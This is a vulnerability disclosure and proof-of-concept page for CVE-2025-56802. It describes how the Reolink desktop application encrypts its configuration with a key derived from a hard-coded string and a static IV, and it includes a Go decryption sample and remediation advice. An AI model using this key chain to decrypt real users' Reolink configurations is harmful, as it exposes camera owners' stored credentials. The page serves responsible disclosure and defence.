PoC details: 7408e442d667a035ef4cafb2b3767cd88fb020d4

Source
Related vulnerability
Title: Reolink desktop application security vulnerability (CVE-2025-56802)
Description: The Reolink desktop application is security-camera monitoring software from the US company Reolink. It contains a security vulnerability that stems from encrypting user configuration files with a hard-coded, predictable AES key, which may allow a local attacker to decrypt sensitive data.
Description
AES-CFB Key Generation and Management Vulnerability in Reolink Desktop Application
Introduction
# CVE-2025-56802
### AES-CFB Key Generation and Management Vulnerability in Reolink Desktop Application
## 1. Overview

<img src="images/reolink-icon.png" alt="Reolink Icon" align="left" width="150" hspace="10"/>
<br clear="left"/>

- **Name**: Reolink Desktop Application
- **Version**: 8.18.12
- **Vendor**: Reolink
- **CWE**: [CWE-321: Use of Hard-coded Cryptographic Key](https://cwe.mitre.org/data/definitions/321.html), [CWE-522: Insufficiently Protected Credentials](https://cwe.mitre.org/data/definitions/522.html)
- **CVSS**: 
- **Vector String**: 
## 2. Summary
The Reolink Desktop Application (version 8.18.12) uses the AES-CFB algorithm to encrypt configuration files and other sensitive data.  

However, the encryption key is handled in an insecure manner, which allows attackers to easily decrypt the protected configuration data.

## 3. Details
The Reolink application stores user configuration and other sensitive information at the following path:
```
%APPDATA%\reolink\<UUID>.json
```
`<UUID>` has this format: `424e044d-aa27-4e59-873a-26b9f16be9ad`

This configuration file is encrypted using AES-CFB, and the AES key used for decryption is derived through the following process:
  1. Open the file located at the following path: 
     ```
     %APPDATA%\com.reolink.app.client
     ```
     The file contains data in JSON format, for example:
     ```
     {
       "data": "+lWlitlpr9vBiG71RCJYoPSJKVnUgGVbgu4v9W6K3N0kzgLv9HEQpqVi2fMnHdb7iWhYgb5KeRhYb6IPVWRR4kxTcwTDfQmMOvFWLuqHPRJBt9ozPSo4TYDXzjBN0YAW",
       "__internal__": {
         "migrations": {
           "version": "8.18.12"
         }
       }
     }
     ```
  2. The application uses `MD5("com.reolink.app").upper()` as the primary AES key, and `bcswebapp1234567` as the IV. The encrypted string (`data`) is base64-decoded and then decrypted. The decrypted string has this format: `59083200-3875-4f67-a067-d953286114a0`
     
  3. The final key is `MD5("<DECRYPTED_STRING>").upper().encode()`, and the IV remains the same (`bcswebapp1234567`). This is used to decrypt the configuration file, `<UUID>.json`.
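As an added illustration (not the advisory's `poc.py`), the two-stage derivation above in Go on constructed data: `EncryptFixture` builds stand-ins for the client file's `data` field and the encrypted config, and `RecoverConfig` recovers the config from nothing but the constants printed above. It assumes the MD5 key is the upper-cased hex digest and that the CFB segment size is 128 bits (Go's only variant; the advisory does not state it); the UUID and JSON used are constructed values.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/md5"
	"encoding/base64"
	"fmt"
)

const advisoryIV = "bcswebapp1234567" // IV quoted in the advisory: 16 ASCII bytes, one AES block

// deriveKey is the derivation the advisory describes: upper-case hex MD5 of a
// string, used directly as a 32-byte AES-256 key. No secret goes in.
func deriveKey(s string) []byte {
	sum := md5.Sum([]byte(s))
	return []byte(fmt.Sprintf("%X", sum[:]))
}

// cfbCrypt applies AES-CFB one way; newStream is cipher.NewCFBEncrypter or
// cipher.NewCFBDecrypter. Assumes 128-bit feedback CFB (Go's only variant).
func cfbCrypt(key, in []byte, newStream func(cipher.Block, []byte) cipher.Stream) []byte {
	block, err := aes.NewCipher(key)
	if err != nil {
		panic(err) // deriveKey always returns a valid 32-byte key
	}
	out := make([]byte, len(in))
	newStream(block, []byte(advisoryIV)).XORKeyStream(out, in)
	return out
}

// EncryptFixture builds constructed stand-ins for the two files: the base64
// "data" field (installUUID under stage1Key) and the body of <UUID>.json.
func EncryptFixture(stage1Key []byte, installUUID, configJSON string) (string, []byte) {
	c1 := cfbCrypt(stage1Key, []byte(installUUID), cipher.NewCFBEncrypter)
	c2 := cfbCrypt(deriveKey(installUUID), []byte(configJSON), cipher.NewCFBEncrypter)
	return base64.StdEncoding.EncodeToString(c1), c2
}

// RecoverConfig walks the chain using only constants printed in the advisory.
// That it succeeds without any per-user secret is the vulnerability.
func RecoverConfig(clientData string, configCipher []byte) (string, error) {
	c1, err := base64.StdEncoding.DecodeString(clientData)
	if err != nil {
		return "", err
	}
	installUUID := cfbCrypt(deriveKey("com.reolink.app"), c1, cipher.NewCFBDecrypter)
	return string(cfbCrypt(deriveKey(string(installUUID)), configCipher, cipher.NewCFBDecrypter)), nil
}
```

Replacing the stage-1 key with a per-install secret that cannot be computed from constants is enough to make `RecoverConfig` fail, which is the point of the recommendations in section 5.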
     
## 4. Proof of Concept (PoC)
By executing [poc.py](poc.py), you can get the final key before it is MD5 hashed (in the format `59083200-3875-4f67-a067-d953286114a0`) and the contents of the configuration file.

## 5. Recommendations
A hash of a hard-coded static string, such as `com.reolink.app`, should not be used as the primary key.  

Additionally, keys should not be stored in a predictable local file, such as in `%APPDATA%`. Strong, validated secure keystores provided by the operating system, such as Windows DPAPI or macOS Keychain, must be used to protect all sensitive credentials.
## 6. References
File snapshot

```
[4.0K] /data/pocs/7408e442d667a035ef4cafb2b3767cd88fb020d4
├── [4.0K] images
│   └── [4.9K] reolink-icon.png
├── [2.2K] poc.py
└── [2.6K] README.md

1 directory, 3 files
```